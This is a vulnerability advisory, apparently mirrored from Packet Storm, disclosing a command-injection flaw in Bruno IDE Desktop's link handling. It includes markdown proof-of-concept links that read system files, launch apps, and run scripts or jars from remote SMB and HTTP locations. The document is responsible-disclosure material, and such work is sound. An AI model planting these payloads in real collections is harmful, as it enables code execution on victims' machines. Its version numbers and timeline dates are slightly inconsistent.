Share
## https://sploitus.com/exploit?id=PACKETSTORM:188714
=====[ Tempest Security Intelligence - ADV-10/2024
    ]==========================
    
    Bruno IDE Desktop prior to 1.29.0
    
    Author: Rodolfo Tavares
    
    Tempest Security Intelligence - Recife, Pernambuco - Brazil
    
    =====[ Table of Contents ]==================================================
    
    Overview
    Detailed Description
    Timeline of Disclosure
    Thanks & Acknowledgements
    References
    
    =====[ Vulnerability Information
    ]===========================================
    
    Class: Improper Neutralization of Input During Web Page Generation
    ('Command Injection') [CWE-78]
    CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H - 9.8
    
    =====[ Overview ]===========================================================
    
    System Affected: Bruno IDE Desktop
    Software Version: All versions prior to 1.29.0
    Impacts:
    Vulnerability: A command injection vulnerability in the function
    shell.openExternal of Bruno IDE Desktop prior to version 1.29.0 allows
    attackers to execute arbitrary commands by supplying a crafted URL, leading
    to potential remote code execution.
    
    =====[ Detailed Description ]===============================================
    
    Command Injection [PoC - Reproduction Steps]:
    
    1. Launch Bruno IDE Desktop on any supported operating system.
    2. Create a Collection and navigate to the Docs tab
    3. Insert the following markdown payloads depending on the target OS:
    
    Linux:
    
    [passwd](/etc/passwd)
    
    [smb](smb://localhost/public/x.desktop) - Malicious .desktop file
    
    [sftp](sftp://user@localhost/home/user/s.desktop) - Malicious .desktop file
    
    POC Video: https://www.youtube.com/watch?v=SPCGVLEfVgw
    
    Windows:
    
    [Calc](C:/Windows/system32/calc.exe)
    
    If Java is installed, directly execute a malicious .jar file:
    
    [exploit](http://localhost/pwn.jar)
    
    [exploit](C:/Users/user/Downloads/pwn.jar)
    
    POC Video: https://www.youtube.com/watch?v=KVwKQkXA-vI
    
    macOS:
    
    [calc](/System/Applications/Calculator.app) - Opens Calculator on macOS.
    
    [calcFile](System/Applications/Calculator.app) - Another method to trigger
    Calculator.
    
    [exploit1](smb://10.211.55.6/public/hello.scptd) - Connects to a remote SMB
    share and executes a script.
    
    [exploit2](/Volumes/hello.scptd/Contents/Resources/Scripts/main.scpt) -
    Executes a script from a mounted volume.
    
    [file](///etc/hosts) - Reads the system’s /etc/hosts file.
    
    [facetime1](facetime:+123456789) - Attempts to launch FaceTime with a
    specific phone number.
    
    [facetime2](facetime:someone@example.com) - Triggers FaceTime using an
    email address.
    
    [tel](tel:+123456789) - Initiates a phone call via the tel: protocol.
    
    [mail](x-apple-reminder://) - Opens the Apple Reminders app via a custom
    protocol.
    
    [calendar](calendar://) - Attempts to open a calendar application.
    
    POC Video: https://www.youtube.com/watch?v=S0W93tbKaFY
    
    4. Upon execution, the crafted URL results in arbitrary command execution
    in the victim's environment.
    
    =====[ Timeline of Disclosure
    ]==============================================
    
    14/Set/2024 - Responsible disclosure was initiated with the vendor.
    16/Set/2024 - Vendor acknowledged the vulnerability.
    20/Nov/2024 - The vendor released a patch (version 1.29.1) addressing the
    issue.
    24/Out/2024 - CVE-2024-48463 was assigned and reserved.
    
    =====[ Thanks & Acknowledgements ]==========================================
    
    Tempest Security Intelligence [1]
    Rodolfo Tavares - Vulnerability Discover
    Filipe Xavier - Special Thanks
    Henrique Arcoverde - Special Thanks
    
    =====[ References ]=========================================================
    
    [1] https://www.tempest.com.br
    [2] https://cwe.mitre.org/data/definitions/78.html
    [3] https://gist.github.com/opcod3r/ab69f36d52367df7ffac32a597dff31c
    [4] https://nvd.nist.gov/vuln/detail/CVE-2024-48463
    
    =====[ EOF ]===============================================================
    --
    
    -- 
    
    *Esta mensagem é para uso exclusivo de seu destinatário e pode conter 
    informações privilegiadas e confidenciais. Todas as informações aqui 
    contidas devem ser tratadas como confidenciais e não devem ser divulgadas a 
    terceiros sem o prévio consentimento por escrito da Tempest. Se você não é 
    o destinatário não deve distribuir, copiar ou arquivar a mensagem. Neste 
    caso, por favor, notifique o remetente da mesma e destrua imediatamente a 
    mensagem.*
    
    *
    *
    *This message is intended solely for the use of its 
    addressee and may contain privileged or confidential information. All 
    information contained herein shall be treated as confidential and shall not 
    be disclosed to any third party without Tempest’s prior written approval. 
    If you are not the addressee you should not distribute, copy or file this 
    message. In this case, please notify the sender and destroy its contents 
    immediately.**
    *
    *
    *